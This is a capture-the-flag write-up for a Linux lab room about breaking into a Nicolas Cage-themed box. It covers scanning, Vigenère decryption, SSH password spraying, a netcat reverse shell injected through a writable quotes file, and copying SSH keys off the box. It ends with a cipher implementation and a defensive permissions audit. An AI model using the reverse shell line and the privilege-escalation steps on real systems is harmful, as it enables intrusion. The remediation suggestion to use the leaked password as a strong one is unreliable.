
[Linux] Break Out The Cage

Reconnaissance

sudo nmap 10.10.211.144
sudo nmap -A -p 21,22,80 10.10.211.144

Enumeration

HTTP

gobuster dir -u http://10.10.211.144/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

FTP

FTP allows anonymous login, so we can connect to the FTP server without credentials. We grab a file called "dad_tasks" and read its content.

ftp 10.10.211.144

Cryptanalysis x OSINT

The content of the file seems to be base64 encoded.

The decoded text is itself still encrypted.

We use dcode.fr to identify which cipher was used. Vigenère is reported as the most probable candidate, and the platform's Vigenère Solver breaks the ciphertext. The key is namelesstwo.

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.

In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes

Mydadisghostrideraintthatcoolnocausehesonfirejokes could be a password, so we need to know who it belongs to. As the writer says these tasks are for his/her father, who is Ghost Rider, we can conclude that the author is one of Nicolas Cage's children.

Nicolas Cage has three children: Weston, Kal-El, August.

Exploitation

SSH

We can perform a password-spraying attack on the SSH service with this password and log in with the account it belongs to.

Lateralisation

The message below keeps popping up on the screen.

Broadcast message from cage@national-treasure (somewhere) (Wed Oct 30 12:39:01

Shoot him again... His soul's still dancing. — Bad Lieutenant: Port Of Call

Most probably a script is running in the background. We can use pspy to find it. First we upload pspy to the target.

We find the program that displays the message on the screen.

It is the program /opt/.dads_scripts/spread_the_quotes.py.

This script displays the content of the file /opt/.dads_scripts/.files/.quotes, which we have permission to modify.

We use this file to obtain a reverse shell as the cage account, since cage owns the file and the script runs as him.

echo ";rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.94.7 4242 >/tmp/f" > .quotes

We can get a stable shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg 

Persistence

We can copy the SSH keys off the target for persistence.

python -m http.server # target machine
wget http://10.10.211.144:8000/id_rsa
wget http://10.10.211.144:8000/id_rsa.pub

Escalation

In email_3 we find something that seems encrypted: haiinspsyanileph.

It is Vigenère encoded with the key "FACE".

Decrypting it gives the root password: root:cageisnotalegend
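Both cipher steps in this writeup (the base64-then-Vigenère layering of dad_tasks with the key namelesstwo, and the email_3 string with the key FACE) use the same classical cipher, so here is one added Python implementation of it; this is example code written for this page, not the author's tooling and not dcode.fr's solver. The page does not show the dad_tasks ciphertext, so the round trip for that file uses a constructed note; the handling of non-letters (passed through, not consuming a key character) is an assumption, and the helper names are mine.

```python
import base64
import string

ALPHABET = string.ascii_lowercase


def _key_shifts(key: str) -> list:
    """Turn an alphabetic key such as "FACE" into per-letter shifts [5, 0, 2, 4]."""
    shifts = [ALPHABET.index(k) for k in key.lower() if k in ALPHABET]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    return shifts


def _shift_text(text: str, key: str, direction: int) -> str:
    """Apply the Vigenère shift (+1 encrypt, -1 decrypt) to every letter.

    Assumption (the page does not show its ciphertext verbatim): non-letters
    such as spaces and punctuation pass through unchanged and do not consume a
    key character; letter case is preserved.
    """
    shifts = _key_shifts(key)
    out = []
    pos = 0  # index into the key, advanced only when a letter is processed
    for ch in text:
        lower = ch.lower()
        if lower in ALPHABET:
            shift = shifts[pos % len(shifts)] * direction
            new = ALPHABET[(ALPHABET.index(lower) + shift) % 26]
            out.append(new.upper() if ch.isupper() else new)
            pos += 1
        else:
            out.append(ch)
    return "".join(out)


def vigenere_encrypt(plaintext: str, key: str) -> str:
    return _shift_text(plaintext, key, +1)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    return _shift_text(ciphertext, key, -1)


def encode_dad_tasks(note: str, key: str) -> str:
    """Constructed inverse of the dad_tasks layering: Vigenère-encrypt, then base64."""
    return base64.b64encode(vigenere_encrypt(note, key).encode("utf-8")).decode("ascii")


def decode_dad_tasks(blob: str, key: str) -> str:
    """Reproduce the two-layer recovery of dad_tasks: the file body is base64,
    and the decoded text is Vigenère-encrypted with the solver's key."""
    inner = base64.b64decode(blob).decode("utf-8")
    return vigenere_decrypt(inner, key)


if __name__ == "__main__":
    # The email_3 string from the page, decrypted with the key FACE.
    print(vigenere_decrypt("haiinspsyanileph", "FACE"))
    # Constructed round trip of the dad_tasks layering with the key namelesstwo.
    note = "In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes"
    print(decode_dad_tasks(encode_dad_tasks(note, "namelesstwo"), "namelesstwo") == note)
```

Running the script prints cageisnotalegend for the email_3 string, which is why a Vigenère key as short as FACE offers no real protection: with the key guessed from context, recovery is a few lines of arithmetic.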

Remediation

To secure the system, consider these actions:

  1. Use scp (over SSH) instead of anonymous FTP for file transfers.

  2. Disable SSH password-based login in favor of key-based authentication.

  3. Implement strong passwords, e.g., Mydadisghostrideraintthatcoolnocausehesonfirejokes.

  4. Review and restrict file access permissions, particularly on sensitive files like .quotes.
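As an added defender-side example (not part of the original writeup), the following Python audit flags the misconfiguration that the Lateralisation section relies on: a file read by a scheduled script that users other than the script's owner can write or replace. It also strips the offending write bits. The /opt/.dads_scripts layout is rebuilt in a temporary directory as a constructed demo; the function names, the demo quote text and the checks chosen are assumptions of mine, not the room's own tooling.

```python
import os
import stat
import tempfile
from pathlib import Path

OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def writable_by_others(path: str) -> bool:
    """True if the group or world write bit is set on path (stat-based, so the
    answer does not depend on which user runs the audit)."""
    return bool(os.stat(path).st_mode & OTHER_WRITE)


def audit_script_inputs(script: str, inputs) -> list:
    """Return [(path, [reasons])] for every input file of `script` that someone
    other than the script's owner could alter before the script reads it.

    Checks: the file itself is group/world-writable; its parent directory is
    writable by others without the sticky bit (so the file could be replaced);
    the file is owned by a different user than the script.
    """
    script_uid = os.stat(script).st_uid
    findings = []
    for path in inputs:
        reasons = []
        st = os.stat(path)
        if st.st_mode & OTHER_WRITE:
            reasons.append("file is group/world-writable")
        parent_mode = os.stat(os.path.dirname(os.path.abspath(path))).st_mode
        if (parent_mode & OTHER_WRITE) and not (parent_mode & stat.S_ISVTX):
            reasons.append("parent directory is writable by others (file can be replaced)")
        if st.st_uid != script_uid:
            reasons.append("owned by a different user than the script")
        if reasons:
            findings.append((path, reasons))
    return findings


def restrict(path: str) -> int:
    """Strip group and world write bits, keep every other mode bit; return the new mode."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    new_mode = mode & ~OTHER_WRITE
    os.chmod(path, new_mode)
    return new_mode


def build_demo_tree() -> tuple:
    """Constructed demo mirroring the page's /opt/.dads_scripts layout inside a
    temporary directory: one world-writable quotes file and one correctly
    restricted copy. Returns (script, weak_file, fixed_file) as strings."""
    root = Path(tempfile.mkdtemp(prefix="cage_demo_"))
    files_dir = root / ".dads_scripts" / ".files"
    files_dir.mkdir(parents=True)
    os.chmod(files_dir, 0o755)
    script = root / ".dads_scripts" / "spread_the_quotes.py"
    script.write_text("# placeholder standing in for the page's quote broadcaster\n")
    weak = files_dir / ".quotes"
    weak.write_text("Shoot him again... His soul's still dancing.\n")
    os.chmod(weak, 0o666)  # the misconfiguration: any local user can change the content
    fixed = files_dir / ".quotes_fixed"
    fixed.write_text("Shoot him again... His soul's still dancing.\n")
    os.chmod(fixed, 0o644)  # owner-writable only, as remediation item 4 asks
    return str(script), str(weak), str(fixed)


if __name__ == "__main__":
    script, weak, fixed = build_demo_tree()
    for path, reasons in audit_script_inputs(script, [weak, fixed]):
        print(path, "->", "; ".join(reasons))
    restrict(weak)
    print("after restrict:", audit_script_inputs(script, [weak, fixed]))
```

The owner check matters as much as the mode bits: the page's script runs as cage and reads a file cage owns, so a 0o644 mode is sufficient there, but a file owned by a lower-privileged account would stay a finding even with group and world write removed.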
